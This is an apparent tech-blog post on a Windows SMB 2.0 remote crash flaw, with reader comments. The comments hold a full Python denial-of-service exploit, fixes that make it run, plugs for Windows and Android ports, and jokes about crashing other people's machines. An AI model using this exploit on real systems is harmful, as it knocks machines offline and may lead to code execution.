[Laurent Gaffié] has discovered an exploit that affects Windows Vista, Windows 7, and possibly Windows Server 2008 (unconfirmed). This method attacks via the NEGOTIATE PROTOCOL REQUEST which is the first SMB query sent. The vulnerability is present only on Windows versions that include Server Message Block 2.0 and have the protocol enabled. A successful attack requires no local access to the machine and results in a Blue Screen of Death.
[Laurent] has a proof of concept available with his writeup in the form of a python script (please, white hat use only). There is no patch for this vulnerability but disabling the SMB protocol will protect your system until one is available.
Update: According to the Microsoft advisory this vulnerability could lead to code execution, making it a bit worse than we thought. On the bright side, they claim that the final version of Windows 7 is not open to this attack, only Windows Vista and Windows Server 2008.
[via Full Disclosure]
[picture: Inquirer]
99 bugs in the os that I use
99 bugs in the os
Patch one bug
Install the new bug fix,
101 bugs left in the system that I use!
This one is pretty ugly. I wouldn’t like having my computer getting a intentional BSOD in a library, university network or on a LAN party.
I use other OS so no problem, but if I had windows I would block port 443. This will stop your windows from file-sharing but it is still better than letting others blue-playing with it.
Yup, saw this today. There’s a windows command line PoC available too. Tested and confirmed earlier.
The win command line tool is at http://www.dereenigne.com
@proofreading nazi: You’re right, we should have used “affect”. Effect vs Affect should be bookmarked for us from now on. Updated.
It “effects” Windows? Well…that word does fit there grammatically, but you probably meant “affects”.
I remember when I used to come here for NEW tech news/hacks (really hacks) but now even reddit is ahead…. /rant
cool..
That is why I use Ubuntu! Forget Windows go Linux!
The RTM version of 7 is not affected. Only prerelease versions are vulnerable to this.
rsvpepper, I too am a full-time Linux user, but I need to say, don’t become smug about it. Ubuntu still breaks terribly on too much hardware to be a full-time solution for everyone. It is not THE ANSWER. I mean, my wireless is unstable, my sound is sort of broken, my touchpad’s driver doesn’t allow me to turn off tap-to-click, and connecting to FTP via the option in Nautilus stalled and left a file copy open indefinitely. I am on an Eee that is a couple years old, running 9.04. It is stable enough for what I do with it (take notes) but it isn’t great. It works beautifully on my older Dell Latitude though.
It is ready for a lot of people on the desktop, but you need to do your research before posing it as the answer to life, the universe, and everything. It will get there, but it is going to take some time.
[/offtopic]
I agree with full disclosure. I honestly don’t see how anyone can sympathize with such an excruciatingly slow-to-react company.
“with her writeup”
BTW, Laurent is male name
Oh what a scary day,…….
Everyone love them some Windows Domains right about now.
How many Admins admittedly have a little bit of sweet running down there brow??
@speps: thanks, updated.
wow thanks for the information. I should tell about all the user of windows 7 & vista in my school. I don’t want them make me busy all day because any script kiddies run this vulnerabilities script.
“to all win 7 & vista user please stop your file sharing and put some firewall”
This does not affect Windows 7 RTM, only the RC and beta
@Mio
@Austin
Yeah, it doesn’t, I just experienced that when trying to bring a friend’s computer offline :)
@Addictronics
Just because you don’t like the post it doesn’t mean others don’t like it too. Instead of going furious, you should be happy because hackaday is publishing public security disclosures.
Maybe you would like to know about this vulnerability by “the hard way” (i.e. going BSOD) instead? Because I don’t think so.
@rsvpepper
I also use GNU/Linux but I don’t think this is the correct way of calling people either.
@jbot
IMHO, OS wizardry and automatism is more prune to bugs and breakage (assuming people know what they do at manual configurations).
So have you tried other GNU/Linux with other tradeoff between automatism-buggyness? Maybe you like it.
@Me
STFU already and stop procrastinating work.
1 bug in the os that I use
1 bug in the os
Patch one bug
Install the new bug fix,
Break xorg.conf…
crap.
Just another cool way to reboot your desktop…..or someone else’s.
@SexieWASD
runlevel 3 is your friend… *evil mad scientist grin*
http://www.ubergeek.tv/article.php?pid=54
whahahahahahaha *evil grin* hmmmm soudns like fun expesually since im a full time linux user lol
@SexieWASD
Nobody tunes Xorg.conf anymore.
* Screen resolution is auto-detected by XrandR, or proprietary drivers, the same for multi-screen setups.
* Most distros use the XInput/hal for auto-detecting and configuring input devices.
You can even delete Xorg.conf, your screen will be set up correctly and the keyboard/mouse recognized.
Golden rule of the ignorance:
The less you know about it, the funnier the joke will be.
Actually for my computer I have to tune xorg.conf everytime I reformat because it detects my video card settings completely wrong I mean it’s no big deal for me but for alot of people who don’t know it’d be a real turnoff.
Posting from my debian machine ssh tunneled through a freebsd machine <3
You know what? I think I might just abandon M$ forever… Those evil M$ bastards are just after my money. They have it so much better over at the app store. Knowledge and innovation after all, were meant to be controlled by corporations. Don’t you know that the blue screen of death and the frowning mac icon are mere fantasy. Yes, pound your machine for your own misunderstanding of how it actually works. You MUST understand that corporations need control your machine for you. You and I are far too unintelligent to understand what our machine is doing for us.
@ Dave
[img]http://img353.imageshack.us/img353/9117/daveyv6.jpg[/img]
Dude,
I just shouted on Hack a Day! Feels great!
With Arguments
———–
#!/usr/bin/python
#When SMB2.0 recieve a “&” char in the “Process Id High” SMB header field
#it dies with a PAGE_FAULT_IN_NONPAGED_AREA error
from socket import socket
from time import sleep
import sys
print “\n~> SMBv2.0 Overflow de Negociacao”
if len(sys.argv)!=2:
print “~> Erro – Uso: %s ” % sys.argv[0]
sys.exit(0)
host = sys.argv[1], 445
buff = (
“\x00\x00\x00\x90” # Begin SMB header: Session message
“\xff\x53\x4d\x42” # Server Component: SMB
“\x72\x00\x00\x00” # Negociate Protocol
“\x00\x18\x53\xc8” # Operation 0x18 & sub 0xc853
“\x00\x26″# Process ID High: –> :) normal value should be “\x00\x00”
“\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe”
“\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54”
“\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31”
“\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00”
“\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57”
“\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61”
“\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c”
“\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c”
“\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e”
“\x30\x30\x32\x00”
)
s = socket()
s.connect(host)
s.send(buff)
s.close()
All setup to test Windows Server 2008 R2 when i run the python script i get the following error:
C:\temp>Smb-Bsod.py 192.168.1.11
Traceback (most recent call last):
File “C:\temp\Smb-Bsod.py”, line 25, in
s = socket()
NameError: name ‘socket’ is not defined
C:\temp>
does it require 2 arguments?
C:\temp>Smb-Bsod2.py 192.168.1.11
Traceback (most recent call last):
File “C:\temp\Smb-Bsod2.py”, line 36, in
s.send(buff)
TypeError: must be bytes or buffer, not str
C:\temp>
grr what a formating nightmare
whitewiz, initialise the buffer with create_string_buffer()
alternatively, just use the win32 example at http://www.dereenigne.com
I don’t get it. I used the Python program (which someone also posted above), and after fixing a couple of errors (add “
import socket
” and change “socket()
” to “socket.socket()
“), it didn’t work. Wireshark confirmed that the machine was getting the packet of death (and was even attempting to respond to it), but no bluescreen occurred.No updates installed; no firewall. I suspect the exploit program has been intentionally crippled so script kiddies like me can’t willy-nilly crash machines. :)
Have just finished my Android implementation of this PoC.
Available in the Android market by searching for BSODroid, or you can grab it from http://www.dereenigne.com/
Fun little tool to have on your mobile phone! :)
99 fixes for windows to patch down, 99 fixes to patch, you take one down, patch it around, 100 fixes to patch down. 100 fixes to patch down, 100 fixes to patch, you take one down, patch it around, 101 fixes to patch down.. :D
http://www.dereenigne.com/ for me only pops up a command prompt that quickly closes.
I just ran this against Windows 7… Microsoft lied about it not being affected.
Oh yeah here is proof… http://s3.amazonaws.com/twitpic/photos/large/30067675.jpg?AWSAccessKeyId=0ZRYP5X5F6FSMBCCSE82&Expires=1253076992&Signature=e75uSLkMMyDzdPO355qu0nNxKLo%3D
http://s3.amazonaws.com/twitpic/photos/large/30067675.jpg
The error “TypeError: must be bytes or buffer, not str” appear if you have Python 3.x installed.
Just uninstall Python 3.x and install Python 2.6.x
THOSE PESKY PLUMBERS AGAIN
@Mrx not 443, it is 445
It was really awesome trick but if you want some more then check link given below….
http://minefreestuff.blogspot.com/2009/12/raise-your-windows-vista-rating-tweak.html
Windows Vista is good but it can hog your CPU and Memory.,’-